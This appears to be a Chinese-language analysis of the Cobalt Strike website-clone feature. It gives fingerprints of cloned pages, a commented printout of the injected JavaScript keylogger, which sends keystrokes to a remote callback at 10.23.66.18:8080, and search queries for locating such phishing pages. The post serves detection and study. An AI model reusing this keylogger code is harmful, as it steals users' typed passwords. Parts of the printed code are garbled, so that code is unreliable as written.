分析過程
cs克隆克隆後的html與原html對比
特徵:
- IFRAME標籤為大寫,且長寬為0。
- script標籤載入了js路徑為”/jquery/jquery.min.js”
順序特徵:
- IFRAME標籤和script標籤同時出現時,一定是IFRAME標籤、script標籤和body標籤這個順序。
- IFRAME標籤和script標籤只出現一個時,一定在body標籤之前。
引用的js分析:
<span>var</span> cfqPdaQzXzSSf = <span>0</span>;<br><span>window</span>.onload = <span><span>function</span> < span>loadfqPdaQzXzSSf</span>(<span></span>) </span>{ <span>//頁面載入處理事件</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> <span>if</span> (<span>window</span>. addEventListener) { <span>//物件觸發指定的事件</span><br> <span>document</span>.addEventListener(<span>'keypress'</span>, pfqPdaQzXzSSf, <span>true</span>); <span>//keypress所有鍵都會觸發該事件,無論它們是否產生字元值處理函數
fqPdaQzXzSSf</span><br> <span>document</span>.addEventListener(<span>'keydown'</span>, dfqPdaQzXzSSf, <span>true</span>); <span>//keydown當按下某個鍵時會觸發該事件處理函數:dfqPdaQzXzSSf</span><br> } <span>else</span> <span>if</span> (<span>window</span>.attachEvent) { <span>//attachEvent在IE9以下的版本中支援。其它的都支援addEventListener</span><br> <span>document</span>.attachEvent(<span>'onkeypress'</span>, pfqPdaQzXzSSf);<br> <span>document</span>.attachEvent (<span>'onkeydown'</span>, dfqPdaQzXzSSf);<br> } <span>else</span> { <span>//兩者都不支援全部置空</span><br> <span>document</span>.onkeypress = pfqPdaQzXzSSf;<br> <span>document< /span>.onkeydown = dfqPdaQzXzSSf;<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>pfqPdaQzXzSSf</span>(<span>e</span>) < /span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which; <span>//只有當DOM事件處理程序被呼叫的</span>< br> kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(<span>16</span>); <span>//將鍵盤碼轉換為ascii</span><br> <span>if</span> (kfqPdaQzXzSSf != <span>"d"</span>) { <span>//隨便寫個判斷進入函數</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>dfqPdaQzXzSSf</span>(<span>e</span>) < /span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which;<br> <span>if</span> (kfqPdaQzXzSSf == <span>9< /span>||kfqPdaQzXzSSf == <span>8</span>||kfqPdaQzXzSSf == <span>13</span>) { <span>//tab鍵,退格鍵,回車鍵</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br> }<br><br><br><span><span>function</span> <span>fqPdaQzXzSSf</span>(<span>kfqPdaQzXzSSf</span>) </span>{<br> lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfSSqPdaQzXzXzSSf = lfqPdaQzXzSSf + kfSSqPdaQzXzf + <span>, <span>.拼接</span><br> <span>var</span> tfqPdaQzXzSSf = <span>"ZUyQXfawhPbi"</span> + cfqPdaQzXzSSf;<br> cfqPdaQzXzSSf++;<br> <span>var</s> ffv span> (<span>document</span>.all&&(navigator.appVersion.match(<span>/MSIE ([\d.]+)/</span>)[<span>1</span>] ) <= <span>8.0</span>) { <span>//瀏覽器版本判斷是否小於或等於8.0</span><br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>String</span>. fromCharCode(<span>60</span>) + <span>"script name='"</span>+tfqPdaQzXzSSf+<span>"' id='"</span>+tfqPdaQzXzSSf+<span>"'"</span> + <span>String</span>.fromCharCode(<span> 62</span>) + <span>String</span>.fromCharCode(<span>60</span>) + <span>"/script"</span> + <span>String</span>.fromCharCode(<span>62</span>));<br> } <span>else</span> {<br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>"script"</span>);<br> ffqPdaQzXzSSf.setAttribute(<span>"id"</span>, tfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.setAttribute(<span>"name"</span>, tfqPdaQzXzSSf);<brzXzSS br> <span>var</span> ejDBFWFHhff = <span>'?id='</span> + <span>window</span>.location.href.split(<span>/\?id=/</span>)[<span>1< /span>]; <span>//取鍵盤ascii碼</span><br> ffqPdaQzXzSSf.setAttribute(<span>"src"</span>, <span>"http://10.23.66.18:8080/callback "</span> + ejDBFWFHhff + <span>"&data="</span> + lfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.style.visibility = <span>visibility "</span>;<br> <span>document</span>.body.appendChild(ffqPdaQzXzSSf); <span>//實例化js,發送鍵盤碼</span><br> <span>if</span> (kfqPdaQzXzSSf == <span> 13</span>||lfqPdaQzXzSSf.length > <span>3000</span>) { <span>//判斷鍵盤碼為回車鍵置空lfqPdaQzXzSSf變數</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> }<br><br><br> setTimeout (<span>'document.body.removeChild(document.getElementById("'</span> + tfqPdaQzXzSSf + <span>'"))'</span>, <span>5000</span>); <span>//延時5秒刪除建立的js</span><br>}<br>頁面載入處理事件,加入針對鍵盤按下的事件。 fqPdaQzXzSSf函數,將鍵盤碼透過建立script標籤將資料傳送到遠端。
pfqPdaQzXzSSf函數:
鍵盤碼轉ascii碼傳送到fqPdaQzXzSSf函數
dfqPdaQzXzSSf函數:
如果按下tab鍵,退格鍵,回車鍵呼叫fqPdaQzXzSSf函數傳送鍵盤
chromechrome
鍵盤碼判斷
鍵盤碼拼接
js建立發送鍵盤碼到遠端
cs遠端接收的密碼
360空間繪圖特徵搜尋:
response:<span>"<head> <base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon \" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"jquery/jquery.min.js\"></script> </body>"</span><br><br>response:<span>"<head> < base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"WIDTH=\"0\" HEIGHT =\"0\"></IFRAME>"</span><br>